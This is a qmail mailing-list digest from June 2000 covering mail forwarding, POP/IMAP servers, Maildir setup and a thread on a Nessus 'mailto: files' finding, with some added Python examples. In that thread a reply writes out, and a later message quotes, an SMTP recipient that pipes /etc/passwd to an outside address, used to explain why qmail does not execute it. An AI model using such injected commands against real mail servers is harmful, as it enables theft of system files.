qmail Digest 3 Jun 2000 10:00:00 -0000 Issue 1021

Topics (messages 42592 through 42618):

Re: Translating qmail messages.
        42592 by: Rodrigo Severo
        42596 by: James Raftery

Forwarding a Mail to other Mailserver
        42593 by: Tushar.Shah.snstech.com
        42594 by: Greg Owen

Redhat 6.2 and PAM
        42595 by: Michael Heitland

What POP/IMAP servers are best?
        42597 by: Enrique Vadillo
        42604 by: Uelinton B. dos Santos
        42607 by: "Próspero, Esteban"

what should the MAIL variable equal
        42598 by: John Stile
        42600 by: Johan Almqvist
        42601 by: John Stile

q: vacation message.. qmail-vacation..
        42599 by: Anton Pirnat

What to do about FAQ 5.4 Security note (password insecure)
        42602 by: John Stile
        42603 by: Petr Novotny

Announcing qmail-qfilter version 1.3
        42605 by: Bruce Guenter

Howto setup multiple postmasters
        42606 by: John Anderson

Re: Qmail: problems with SMTP e Qmailadmin
        42608 by: "Próspero, Esteban"

virtualdomains question
        42609 by: Mike Denka

Queue cleaning: spam problem
        42610 by: Jon Rust

security hole?
        42611 by: Bob Waskosky
        42612 by: Jim Breton
        42613 by: Bob Waskosky
        42614 by: Jim Breton
        42615 by: Bob Waskosky
        42616 by: Russell Nelson
        42617 by: Bob Waskosky
        42618 by: Jim Breton

Administrivia:

To unsubscribe from the digest, e-mail:
        [EMAIL PROTECTED]

To subscribe to the digest, e-mail:
        [EMAIL PROTECTED]

To bug my human owner, e-mail:
        [EMAIL PROTECTED]

To post to the list, e-mail:
        [EMAIL PROTECTED]


----------------------------------------------------------------------



> This will not work unless you put a space on the (currently) blank
> line in the paragraph above.  Without a space, the Portuguese text gets
> interpreted by QSBMF readers as an email address and cause for the
> bounce.
> 
> Otherwise, I see no reason why it shouldn't work, as long as you don't
> break QSBMF.

First of all, thanks for your answer, but please don't mind me asking,
what is QSBMF? I think I should know more about it before I start
translating qmail messages.

BTW, is there a single place for qmail messages or do I have to look in
all executables? Any clues about where to look for them?


TIAAA,

Rodrigo Severo




On Fri, Jun 02, 2000 at 09:14:02AM -0300, Rodrigo Severo wrote:
> what is QSBMF? I think I should know more about it before I start
> translating qmail messages.

The "qmail-send Bounce Message Format":
http://cr.yp.to/proto/qsbmf.txt

Regards,

james
-- 
James Raftery (JBR54)  -  Programmer Hostmaster  -  IE TLD Hostmaster
   IE Domain Registry  -  www.domainregistry.ie  -  (+353 1) 706 2375
  "Managing 4000 customer domains with BIND has been a lot like
   herding cats." - Mike Batchelor, on [EMAIL PROTECTED]




Hello,
I have Domino server running R5 and set all the users and groups on to it.
I would like to set up Qmail on my Red Hat linux 6.1 and would like to set
it up for sending and receiving mail for my domain. At this moment Domino
is doing this job. I want qmail to send and receive mail. The mail which
qmail would receive should get forwarded to my existing domino server. How
do I do this without setting up all the users or groups which I set on
Domino server.
Please help me on this.
Thanks in advance,
Tushar Shah






> I want qmail to send and receive mail. The mail which
> qmail would receive should get forwarded to my existing 
> domino server. How do I do this without setting up all
> the users or groups which I set on Domino server.

        Let's say that for domain foo.com you want your qmail relay
(qmail.foo.com) to forward all mail to your Domino server (domino.foo.com).

        On qmail.foo.com, put 'foo.com' in rcpthosts and
'foo.com:domino.foo.com' in smtproutes.  Make sure that 'foo.com' is not in
locals or virtualdomains on qmail.foo.com.

        This will mean that qmail.foo.com accepts mail for foo.com
(rcpthosts) and that all mail for foo.com is forwarded to domino.foo.com
(smtproutes).

        Once you've set the qmail box up and tested it, modify your DNS so
that your MX records point to qmail.foo.com instead of domino.foo.com.

-- 
        gowen -- Greg Owen -- [EMAIL PROTECTED]
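
A check for the setup described in the reply above, as an added example that is not part of the original message: it reads a qmail control directory and reports anything that would stop mail for the domain from being relayed to the backend. The function names are hypothetical, the control files are constructed in temporary directories, and the suffix matching is a simplified model of how qmail matches wildcard entries.

```python
import os
import tempfile


def read_control(control_dir, name):
    """Non-blank, non-comment lines of a control file, lowercased (missing = empty)."""
    path = os.path.join(control_dir, name)
    if not os.path.exists(path):
        return []
    with open(path) as fh:
        lines = (ln.strip().lower() for ln in fh)
        return [ln for ln in lines if ln and not ln.startswith("#")]


def suffixes(domain):
    """The domain itself, then each '.suffix' (wildcard entries start with a dot)."""
    return [domain] + [domain[i:] for i, c in enumerate(domain) if c == "."]


def check_forwarding(control_dir, domain, backend):
    """Return problems with relaying `domain` to `backend`; an empty list means OK."""
    domain, backend = domain.lower(), backend.lower()
    problems = []

    rcpthosts = set(read_control(control_dir, "rcpthosts"))
    if not any(s in rcpthosts for s in suffixes(domain)):
        problems.append("rcpthosts: domain not accepted over SMTP")

    routes = {}
    for line in read_control(control_dir, "smtproutes"):
        dom, _, relay = line.partition(":")
        routes[dom] = relay.split(":")[0]          # drop an optional :port
    # Most specific entry wins; an entry with an empty domain is the default route.
    relay = next((routes[s] for s in suffixes(domain) + [""] if s in routes), None)
    if relay != backend:
        problems.append(f"smtproutes: routed to {relay!r}, expected {backend!r}")

    if domain in read_control(control_dir, "locals"):
        problems.append("locals: mail would be delivered on this host")

    for line in read_control(control_dir, "virtualdomains"):
        key = line.split(":", 1)[0]
        if key in suffixes(domain) or key.endswith("@" + domain):
            problems.append("virtualdomains: mail would be delivered on this host")
            break
    return problems


def write_control(control_dir, files):
    for name, lines in files.items():
        with open(os.path.join(control_dir, name), "w") as fh:
            fh.write("\n".join(lines) + "\n")


def demo():
    """Constructed control directories: the setup from the reply, then a broken one."""
    with tempfile.TemporaryDirectory() as good, tempfile.TemporaryDirectory() as bad:
        write_control(good, {"rcpthosts": ["foo.com"],
                             "smtproutes": ["foo.com:domino.foo.com"],
                             "locals": ["qmail.foo.com"]})
        write_control(bad, {"rcpthosts": ["foo.com"],
                            "smtproutes": [":smarthost.example"],
                            "locals": ["qmail.foo.com", "foo.com"]})
        return (check_forwarding(good, "foo.com", "domino.foo.com"),
                check_forwarding(bad, "foo.com", "domino.foo.com"))


if __name__ == "__main__":
    ok, broken = demo()
    print("as described:", ok or "no problems")
    for problem in broken:
        print("broken:", problem)
```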

 




I am not able to get checkpassword and qmail-pop3d to work with pam. I have
run two different diffs on the checkpasswd before compiling and still no
luck. Any one else been able to get this distro to work?

Michael Heitland
Data Systems Engineer
702 communications
(218)-284-5702
(p)1-888-462-4508





Hi all,

I have some 15.000 users in my system and i'm currently testing qmail with 
Maildirs (btw i need/want to use Maildirs over NFS), the problem i see is 
that since Maildirs change a tiny bit the way my pop and imap servers work 
(in other words, my current daemons won't work), so i was wondering whether 
you'd have suggestions on what POP and IMAP servers i should use with qmail 
with maildirs so i can have the best performance i can get.

Of course i'd like to change *nothing* in my users' PCs (especially regarding
POP clients!) however IMAP i can handle any client changes very easily.

Thanks a lot for any ideas!

Enrique-




Hi Enrique

Take a look at Courier-IMAP at http://www.inter7.com/courierimap




Uelinton

Enrique Vadillo wrote:

> Hi all,
>
> I have some 15.000 users in my system and i'm currently testing qmail with
> Maildirs (btw i need/want to use Maildirs over NFS), the problem i see is
> that since Maildirs change a tiny bit the way my pop and imap servers work
> (in other words, my current daemons won't work), so i was wondering whether
> you'd have suggestions on what POP and IMAP servers i should use with qmail
> with maildirs so i can have the best performance i can get.






Hi!
The pop3 server that works with qmail (Maildir format, more exactly) is
qmail-pop3d that comes with qmail. All you have to do is to set this pop3
server up (just as you made with your smtp server) after you have put down
your old pop server. Read the FAQ for more instructions of how to set it up
with inetd or tcpserver.

Luck!
Esteban Javier Próspero

> -----Original Message-----
> From: Uelinton B. dos Santos [SMTP:[EMAIL PROTECTED]]
> Sent: Friday, June 02, 2000 3:05 PM
> To:   Enrique Vadillo
> Cc:   [EMAIL PROTECTED]
> Subject:      Re: What POP/IMAP servers are best?
> 
> Hi Enrique
> 
> Take a look at Courier-IMAP at http://www.inter7.com/courierimap
> 
> 
> 
> 
> Uelinton
> 
> Enrique Vadillo wrote:
> 
> > Hi all,
> >
> > I have some 15.000 users in my system and i'm currently testing qmail with
> > Maildirs (btw i need/want to use Maildirs over NFS), the problem i see is
> > that since Maildirs change a tiny bit the way my pop and imap servers work
> > (in other words, my current daemons won't work), so i was wondering whether
> > you'd have suggestions on what POP and IMAP servers i should use with qmail
> > with maildirs so i can have the best performance i can get.




What should $MAIL equal for local accounts on a linux server?

I'm on linux, redhat6.2, and in /etc/profile I set MAIL=~/Maildir/
When I login, I get the message:
"You have mail.
bash: MAIL=/home/jstile/Maildir/: No such file or directory"

listing my home dir, I see that Maildir does exist:
drwx------    5 jstile   jstile       4096 May 10 17:16 Maildir/

listing the Maildir, I see the correct subdir's:
drwx------    2 jstile   jstile       4096 May 10 17:16 cur/
drwx------    2 jstile   jstile       4096 May 16 00:24 new/
drwx------    2 jstile   jstile       4096 May 16 00:24 tmp/

I used /var/qmail/bin/maildirmake to make the Maildir in each users
home.

But I can't check my mail.
I read the FAQ's, and it didn't help me to fix this problem.
If there is a specific doc for this please let me know.





On Fri, Jun 02, 2000 at 09:12:01AM -0700, John Stile wrote:
> What should $MAIL equal for local accounts on a linux server?
> But I can't check my mail.

What mail client (MUA) are you using? Are you sure it's maildir-aware?

> I read the FAQ's, and it didn't help me to fix this problem.
> If there is a specific doc for this please let me know.


-Johan
-- 
Johan Almqvist




not sure.  I think it's pine
Johan Almqvist wrote:

> On Fri, Jun 02, 2000 at 09:12:01AM -0700, John Stile wrote:
> > What should $MAIL equal for local accounts on a linux server?
> > But I can't check my mail.
>
> What mail client (MUA) are you using? Are you sure it's maildir-aware?
>
> > I read the FAQ's, and it didn't help me to fix this problem.
> > If there is a specific doc for this please let me know.
>
> -Johan
> --
> Johan Almqvist





hi there,

anyone who tried out qmail-vacation script (Peter Samuel) together with vpopmail?
As far as i can see it won't use virtual domains as vpopmail is used to do...

i got the mail.. but no vacation message, nor any failure in my logs
(var/log/messages, var/log/mail). 

I tried several changes and also several .qmail-user files..

current one contains a..

--".qmail-u_name"--
| /usr/local/bin/vacation -j username
/var/qmail/vpopmail/domains/domain/
----

and i'd also put a ".vacation.msg " into 
/var/qmail/vpopmail/domains/domain/u_name
and .. (just to make sure its not my old brain)
/var/qmail/vpopmail/domains/d_name/u_name/Maildir/

At the vacation makefile i'd set up qmail mailbox file at .. $$home/Maildir (i
guess its one of the probs i have..).

I assume i only have to change less at the vacation perl script, but dunno
where to search for and what to put in, i guess i am getting older.
Maybe there is a list with all valid qmail ENV variables that helps?

I can.. cook homemade noodles and jelly (not together), repair cars and build
computers, build up networks, support our customers and lots others.. but have
less scripting perl knowledge (yet, but i am hardly working on...)


What i forgot to ask for now? Isn't it time to leave work now? it seems to be..


regards 

Anton Pirnat


-- 
---
this message is shareware, please register!



---------------------------------------------------------
pmg Medien und Service GmbH  phone: +49 711 6574500
Schenkendorfstr. 17            fax: +49 711 6574501
D-70193 Stuttgart              www: www.pop-stuttgart.net
Anton Pirnat, Hostmaster     email: [EMAIL PROTECTED]





If pop3d is insecure, what is secure?
I don't want to setup something that is broken from the get-go.





-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 2 Jun 00, at 10:47, John Stile wrote:

> If pop3d is insecure, what is secure?
> I don't want to setup something that is broken from the get-go.

POP3 protocol is insecure because it requires transmitting 
password in plaintext over a network. (If you have pop3 only on a 
switched LAN with no option of sniffing, pop3 is perfectly safe.)

APOP is a safer alternative of pop (and I believe qmail supports 
APOP as well) but it requires APOP-capable clients.

You may also try to setup POP3 through SSL tunnel or over SSH 
port forwarding (both setups are safe).

[I don't know if IMAP is secure or insecure in password 
transmission; I never liked the beast.]


-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2 -- QDPGP 2.60 
Comment: http://community.wow.net/grt/qdpgp.html

iQA/AwUBOTfl/FMwP8g7qbw/EQIsjwCff9lJHRNycu1PxIFp3RzHpI7d5XQAoKuj
ZNrMfOsIwpBFWfx+rc65BI0C
=r111
-----END PGP SIGNATURE-----
--
Petr Novotny, ANTEK CS
[EMAIL PROTECTED]
http://www.antek.cz
PGP key ID: 0x3BA9BC3F
-- Don't you know there ain't no devil there's just God when he's drunk.
                                                             [Tom Waits]
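
The difference between plain POP3 login and APOP mentioned in the reply above, as an added example that is not part of the original message. It follows RFC 1939: the server greeting carries a timestamp, and the client sends the MD5 digest of that timestamp followed by the shared secret instead of the password. The function names are hypothetical; the timestamp, user and secret are the sample values from RFC 1939.

```python
import hashlib
import hmac
import re

# An APOP-capable server ends its greeting with a <process.clock@host> timestamp.
BANNER_RE = re.compile(r"^\+OK .*?(<[^<>@]+@[^<>]+>)\s*$")


def banner_timestamp(greeting):
    """Return the timestamp from the greeting, or None if APOP is not offered."""
    match = BANNER_RE.match(greeting)
    return match.group(1) if match else None


def apop_digest(timestamp, secret):
    """MD5 over timestamp (angle brackets included) followed by the secret."""
    return hashlib.md5((timestamp + secret).encode("ascii")).hexdigest()


def client_login(greeting, user, secret):
    """Lines the client puts on the wire for this greeting."""
    timestamp = banner_timestamp(greeting)
    if timestamp is None:
        # Plain POP3: the password itself crosses the network.
        return [f"USER {user}", f"PASS {secret}"]
    return [f"APOP {user} {apop_digest(timestamp, secret)}"]


def server_verify(timestamp, line, secrets):
    """Check an APOP command against the timestamp this server issued."""
    parts = line.split()
    if len(parts) != 3 or parts[0].upper() != "APOP":
        return False
    expected = apop_digest(timestamp, secrets.get(parts[1], ""))
    # Constant-time comparison; unknown users fail after the same work.
    return parts[1] in secrets and hmac.compare_digest(expected, parts[2].lower())


def secret_on_wire(lines, secret):
    """True if a passive listener would see the secret in what was sent."""
    return any(secret in line for line in lines)


if __name__ == "__main__":
    secret = "tanstaaf"
    apop = "+OK POP3 server ready <1896.697170952@dbc.mtview.ca.us>"
    plain = "+OK POP3 server ready"
    for greeting in (plain, apop):
        sent = client_login(greeting, "mrose", secret)
        print(sent, "secret visible:", secret_on_wire(sent, secret))
```

The server has to keep each secret in a form it can feed into the digest, and a captured APOP line fails against the next connection's timestamp.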




Version 1.3 of qmail-qfilter is now available at:
        http://em.ca/~bruceg/qmail-qfilter/
See the documentation there for more details,
or join the mailing list by sending an email to:
        [EMAIL PROTECTED]

Development versions of qmail-qfilter are available via anonymous CVS.
Set your CVSROOT to ":pserver:[EMAIL PROTECTED]:/CVS",
login with an empty password, and check out the qmail-qfilter module.
-------------------------------------------------------------------------------
Changes in version 1.3

- A new environment variable, "QMAILRCPTS" is set to a newline-separated
  list of the recipients.  Note that if a large number of recipients are
  encountered (ex more than 64KB worth under Linux), this will cause
  execution of the filters to fail and the message will be rejected.  I
  consider this acceptable, since 64KB worth of recipients is likely
  more than 1000 anyways.
- Removed some GNU-specific constructs from the source and Makefile.
- Included a sample MIME filename extension scanning filter.
-------------------------------------------------------------------------------
-- 
Bruce Guenter <[EMAIL PROTECTED]>                       http://em.ca/~bruceg/




Hi,

I currently have qmail setup, working, and running 7 separate virtual
mail servers.  (Using /control/virtualhosts and /control/rcpthosts).
Also, possibly a sticking point, each user does not have an account on
the mail server, it is setup that there is 1 popuser.

My question is, how do I setup an account (postmaster) to catch all
mis-addressed email, and send it to the proper contact at said domain.

Example:

Tom is the contact at xyz.com
An email comes into [EMAIL PROTECTED]
Currently the email goes nowhere.

I would like the email to go to [EMAIL PROTECTED]

I would also like mail addressed to [EMAIL PROTECTED]  to bounce
to my contact at asdf.com

I know I can set it up so all bounces go to 1 email address, but that
really isn't my ideal situation.


Any help would be appreciated.

--John










Hi!
I have 200 +/- users into 0, 1 and default directories and my users can
authenticate via qmailadmin. You should try the qmailadmin mailing
[EMAIL PROTECTED]

Regards!
Esteban Javier Próspero


> -----Original Message-----
> From: Edilmar Alves [SMTP:[EMAIL PROTECTED]]
> Sent: Tuesday, May 30, 2000 8:57 PM
> To:   [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED];
> [EMAIL PROTECTED]
> Subject:      Qmail: problems with SMTP e Qmailadmin
> 
> Hi all,
> 
> I'd like to solve the following problems:
> 1. SMTP: I configured tcp.smtp like this, to accept
>     e-mails only for these IP subnets:
>     192.168.0.:allow,RELAYCLIENT=""
>     192.168.1.:allow,RELAYCLIENT=""
>     200.241.184.:allow,RELAYCLIENT=""
>     However, I entered from other ISP, with
>     address 200.212.255.25 and SMTP sents
>     my email. I boot Linux but the same behaviour
>     continues to occur.
> 2. QMailAdmin: for 10, 20, 50 users, I think
>     QMailAdmin is very nice. However, I already
>     have more than 600 users, and when I enter
>     with postmaster, to administer the email accounts,
>     I have to spent more than FIVE minutes, using
>     Netscape. I'm using the "graphical interface" from
>     lynx, cause performance !!!
>     Is there a way to change the HTML skeleton pages
>     to show only the buttons, NOT the users list. I think
>     the access may be faster than.
> 2. QMailAdmin II: I created some users (+/- 103 users)
>     into a domain. All Maildir folders was created into
>     .../domains/fes.br/ (fes.br is my domain). After these 103,
>     folders like 0/, 1/, ... was created automatically by QMail.
>     At this point, no problems!
>     However, if one of these new users created into these folders
>     try to use QMailAdmin to change password, the system arises
>     an exception talking about "There already is a user logged with
>     postmaster" (something like this) and the new doesn't get to
>     change your password. I have to change password user per
>     user, with postmaster account.
>     The major users were created with QMailAdmin and some with
>     vadduser. Both users arises the exception.
>     The strange is: the first users created get to change password
>     into Web QMailAdmin...




We are an isp who has used sendmail for many years and we are converting to
qmail.  In sendmail we have traditionally used the virtual user table to
allow customers to use a commonly used mailbox like 'webmaster', for
example, at their domain.  In the virtusertable on sendmail, if you put only
[EMAIL PROTECTED] in the virtusertable, then any other mailbox
address for that domain, [EMAIL PROTECTED] for example, will
automatically default to fred@ our default domain.  With qmail's virtual
user processing, there is no local delivery if 'fred' is not specified in
either the virtual user table itself or in the dot qmail file in the
delivery address specified for the virtual domain.

I'm wondering if there is some way to imitate sendmail's default behavior in
qmail's virtualdomains file or some other qmail control file that I don't
know about yet.  It is very important for us to be able to deliver local
mail to [EMAIL PROTECTED] to [EMAIL PROTECTED] by default - i.e.
without having to create a  .qmail-anyuser file in the delivery mailbox for
customers.domain for each potential recipient.  The reason is that in one
virtual domain case we have literally thousands of such recipients and only
a handful of special delivery cases that will have .qmail files.  Is there a
simple way to do this?

Thanks,

Mike





One of my customers upgraded or changed their mail system yesterday 
and opened it up for relay by accident. That was bad. Worse is that 
they use us as a "smart relay" (which I didn't know until today). So 
now I've got all this mail queued up waiting to go out to hundreds 
and thousands of people.

Are there scripts available that I can use to search through the 
queue, look for a particular subject/Received line/whatever and ax it?

Thanks,
jon "leaving to smack this customer..."




Hi
I scanned myself online using nessus/nmap (scanning my dynamic IP) and received an 
email from nessus stating:

Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false 
positive because I'm scanning myself? Any ideas how to fix this?
Thanks in advance
Bob

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
----------------------------------------------------- 
                           




On Fri, Jun 02, 2000 at 10:58:51PM -0500, Bob Waskosky wrote:
> Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false 
> positive because I'm scanning myself? Any ideas how to fix this?


I believe Nessus (correct me if I'm wrong) is trying to send a mail
message to a program like this:

rcpt to: | programname

in which case qmail doesn't handle it specially, it is probably getting
picked up by your .qmail-default in ~alias (or getting bounced, if you
don't have one).





On Sat, Jun 03, 2000 at 04:09:21AM +0000, Jim Breton wrote:
> On Fri, Jun 02, 2000 at 10:58:51PM -0500, Bob Waskosky wrote:
> > Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false 
> > positive because I'm scanning myself? Any ideas how to fix this?
> 
> 
> I believe Nessus (correct me if I'm wrong) is trying to send a mail
> message to a program like this:
> 
> rcpt to: | programname
> 
> in which case qmail doesn't handle it specially, it is probably getting
> picked up by your .qmail-default in ~alias (or getting bounced, if you
> don't have one).
> 
Is this a hole and how would I plug it?
Thanks

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
----------------------------------------------------- 
                           




On Fri, Jun 02, 2000 at 11:17:30PM -0500, Bob Waskosky wrote:
> Is this a hole and how would I plug it?


No it's not a hole.  It would only be a security concern if your mailer
were to allow the message to actually be piped directly to the program
specified in the "rcpt to" command.

Say for example I were to send this command:

rcpt to: "|mail [EMAIL PROTECTED] < /etc/passwd"

or something similar.  And your MTA happily piped my message to that
program, which also took /etc/passwd as input and mailed it to me at
[EMAIL PROTECTED]  _That_ would be a problem.

With qmail however, pipe symbols are not treated specially and don't
have the same meaning as they would in a shell.  They are handled as
though they are part of a username, and since you don't have a local
user "|mail" the message is treated as any normal message to an unknown
user.

You don't need to change anything.  :)  Nessus assumes that because your
mailer "accepted" the message, it will also deliver it in an "evil"
way... which qmail won't do.





On Sat, Jun 03, 2000 at 04:29:07AM +0000, Jim Breton wrote:
> On Fri, Jun 02, 2000 at 11:17:30PM -0500, Bob Waskosky wrote:
> > Is this a hole and how would I plug it?
> 
> 
> No it's not a hole.  It would only be a security concern if your mailer
> were to allow the message to actually be piped directly to the program
> specified in the "rcpt to" command.
> 
> Say for example I were to send this command:
> 
> rcpt to: "|mail [EMAIL PROTECTED] < /etc/passwd"
> 
> or something similar.  And your MTA happily piped my message to that
> program, which also took /etc/passwd as input and mailed it to me at
> [EMAIL PROTECTED]  _That_ would be a problem.
> 
> With qmail however, pipe symbols are not treated specially and don't
> have the same meaning as they would in a shell.  They are handled as
> though they are part of a username, and since you don't have a local
> user "|mail" the message is treated as any normal message to an unknown
> user.
> 
> You don't need to change anything.  :)  Nessus assumes that because your
> mailer "accepted" the message, it will also deliver it in an "evil"
> way... which qmail won't do.
> 
kewl. Thanks for the info.

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
----------------------------------------------------- 
                           




Bob Waskosky writes:
 > > rcpt to: | programname
 > Is this a hole and how would I plug it?

It's not a hole.  It's someone trying to send mail to the email
address "| programname".  The vertical bar is odd, yes.  The space is
even more unusual, yes.  But a security hole?  No.  It would be if
qmail were to interpret the | specially, as certain versions of other
MTA's have in the past.  But qmail is neither that naive nor trusting.

-- 
-russ nelson <[EMAIL PROTECTED]>  http://russnelson.com
Crynwr sells support for free software  | PGPok | "Ask not what your country
521 Pleasant Valley Rd. | +1 315 268 1925 voice | can force other people to
Potsdam, NY 13676-3213  | +1 315 268 9201 FAX   | do for you..."  -Perry M.
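
What the replies from Jim Breton and Russell Nelson describe, as an added example that is not part of the thread: the local part of the recipient is only ever compared with user names and `.qmail` file names, so a vertical bar in it is data and nothing is run. The lookup order is a simplified model of the one documented in dot-qmail(5) (user-ext addresses are left out), and the function names, users and alias files are constructed for illustration.

```python
def qmail_candidates(ext):
    """.qmail file names tried for `ext`, in order.

    Uppercase is folded to lowercase and dots become colons before the
    lookup, then the -default fallbacks are tried from longest to shortest.
    """
    safe = ext.lower().replace(".", ":")
    names = [".qmail-" + safe]
    parts = safe.split("-")
    for i in range(len(parts) - 1, -1, -1):
        names.append(".qmail-" + "-".join(parts[:i] + ["default"]))
    return names


def deliver(local_part, users, alias_files):
    """Decide the fate of a local recipient without interpreting any character."""
    name = local_part.lower()
    if name in users:
        return ("mailbox", name)
    # Unknown local parts are handed to the alias user's .qmail files.
    for candidate in qmail_candidates(name):
        if candidate in alias_files:
            return ("alias", candidate)
    return ("bounce", "no such mailbox")


def scanner_flags(smtp_reply):
    """The inference described in the thread: recipient accepted => reported."""
    return smtp_reply.startswith("250")


def report(local_part, smtp_reply, users, alias_files):
    """Pair what a scanner concludes with what delivery actually does."""
    return {
        "recipient": local_part,
        "scanner_reports_hole": scanner_flags(smtp_reply),
        "delivery": deliver(local_part, users, alias_files),
    }


if __name__ == "__main__":
    users = {"bob"}                                   # constructed sample data
    for alias_files in ({".qmail-postmaster"}, {".qmail-default"}):
        for rcpt in ("bob", "postmaster", "| programname"):
            print(sorted(alias_files), report(rcpt, "250 ok", users, alias_files))
```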




I think the example line in your reply triggered a virus alert.
I received an email stating the reply I sent possibly contained a password stealing 
virus. I hope that was just triggered by your example. I don't believe I have any 
viruses on this machine.

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
----------------------------------------------------- 
                           




On Sat, Jun 03, 2000 at 12:00:29AM -0500, Bob Waskosky wrote:
> I think the example line in your reply triggered a virus alert.
> I received an email stating the reply I sent possibly contained a password stealing 
> virus. I hope that was just triggered by your example. I don't believe I have any 
> viruses on this machine.


Yah I got the same thing in response to my own message (the one that
included the pipe).

I've sent an e-mail to both the intended recipient and to the
support@whatever address supplied in the bounce message.

:P


